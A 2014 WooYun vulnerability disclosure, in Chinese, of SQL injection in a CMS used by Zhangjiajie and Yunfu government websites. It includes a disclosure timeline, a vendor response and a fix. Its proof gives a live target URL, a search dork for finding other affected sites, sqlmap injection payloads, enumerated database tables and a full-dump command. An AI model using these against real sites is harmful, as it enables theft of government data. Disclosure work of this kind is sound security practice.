当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074161

漏洞标题:云浮信息协会开发的某CMS存在sql注射,可拖裤

相关厂商:云浮信息协会

漏洞作者: 辛县长

提交时间:2014-08-28 12:44

修复时间:2014-10-12 12:46

公开时间:2014-10-12 12:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-28: 细节已通知厂商并且等待厂商处理中
2014-09-02: 厂商已经确认,细节仅向厂商公开
2014-09-12: 细节向核心白帽子及相关领域专家公开
2014-09-22: 细节向普通白帽子公开
2014-10-02: 细节向实习白帽子公开
2014-10-12: 细节向公众公开

简要描述:

影响范围:张家界市各政府部门以及云浮市某些政府机构,可拖裤

详细说明:

百度(一定要用百度哦)关键字 “inurl:jsp?topid=”
由于参数“topid”未过滤致使SQL注入发生。
影响的范围包括张家界市的各个政府机构以及云浮市的某些政府机构
以张家界市某政府网站为例 (所有的政府站点都在同一个域名下,即www.zjj.gov.cn)
注入点:http://www.zjj.gov.cn/deptemplates/public/jsp/photos.jsp?topid=002002017&columnid=002002017002001007

漏洞证明:

Place: GET
Parameter: topid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: topid=002002017' AND 4819=4819 AND 'gRLA'='gRLA&columnid=002002017002001007
    Type: UNION query
    Title: Generic UNION query (NULL) - 35 columns
    Payload: topid=002002017' UNION ALL SELECT NULL,NULL,CHR(113)||CHR(118)||CHR(110)||CHR(100)||CHR(113)||CHR(110)||CHR(104)||CHR(120)||CHR(104)||CHR(112)||CHR(75)||CHR(120)||CHR(118)||CHR(111)||CHR(105)||CHR(113)||CHR(110)||CHR(113)||CHR(105)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- &columnid=002002017002001007
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query - comment)
    Payload: topid=002002017' AND 3885=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--&columnid=002002017002001007


数据库

available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] YFIIA


其中“YFIIA”为目前使用的数据库,后来经过搜索,YFIIA也就是云浮信息协会的缩写
数据库表结构

[54 tables]
+---------------------+
| AD_CONTENT          |
| AREACODE            |
| BBS_BOARD           |
| BBS_BOARD1          |
| B_COLUMNRIGHT       |
| B_DEPARTMENT        |
| B_DEPTRIGHT         |
| B_EMPLOYEE          |
| B_LOGINREC          |
| B_RIGHT             |
| CARDNOS             |
| C_COLCONTENT        |
| C_COLUMN            |
| C_COLUMN_RIGHT      |
| C_DEPSITECOLUMN     |
| C_PROSECUTION       |
| C_RESEARCH          |
| C_RESEARCHANSWER    |
| C_RESEARCHITEM      |
| C_RESEARCHQUESTION  |
| C_RESEARCHREPLY     |
| C_RESEARCHTYPE      |
| C_SOLICIT           |
| C_SOLICITREPLY      |
| C_SOLICITTYPE       |
| C_TEMPLATE          |
| C_TEMPLATEKIND      |
| DR$SEARCH_CONTENT$I |
| DR$SEARCH_CONTENT$K |
| DR$SEARCH_CONTENT$N |
| DR$SEARCH_CONTENT$R |
| EMAILSUBSCRIBE      |
| OA_DOCABOUT         |
| OA_DOCACTION        |
| OA_DOCAFFIX         |
| OA_DOCFLOW          |
| OA_DOCMONITOR       |
| OA_DOCTYPE          |
| OA_DOCUMENT         |
| OA_DOCVOTE          |
| OA_DOCVOTEIP        |
| OA_MAIL             |
| OA_MONITOR          |
| OA_NOTE             |
| P_TYPE              |
| SYS_COLUMN          |
| SYS_DEPARTMENT      |
| SYS_EMPLOYEE        |
| SYS_ROLE            |
| SYS_ROLERIGHT       |
| SYS_TOPNEWS         |
| YSQ_DOCFLOW         |
| YSQ_DOCMONITOR      |
| YSQ_DOCUMENT        |
+---------------------+


经过验证可以脱裤的
sqlmap -u 'http://www.zjj.gov.cn/deptemplates/public/jsp/photos.jsp?topid=002002017&columnid=002002017002001007' --dump-all -D 'YFIIA'
部分裤子如下:

QQ图片20140827150256.jpg


QQ图片20140827145600.jpg


QQ图片20140827145400.jpg

修复方案:

对topid参数过滤处理

版权声明:转载请注明来源 辛县长@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-09-02 11:03

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过其公开邮箱尝试通报,同时根据测试案例,转由CNCERT发给对应的多个分中心处置。

最新状态:

暂无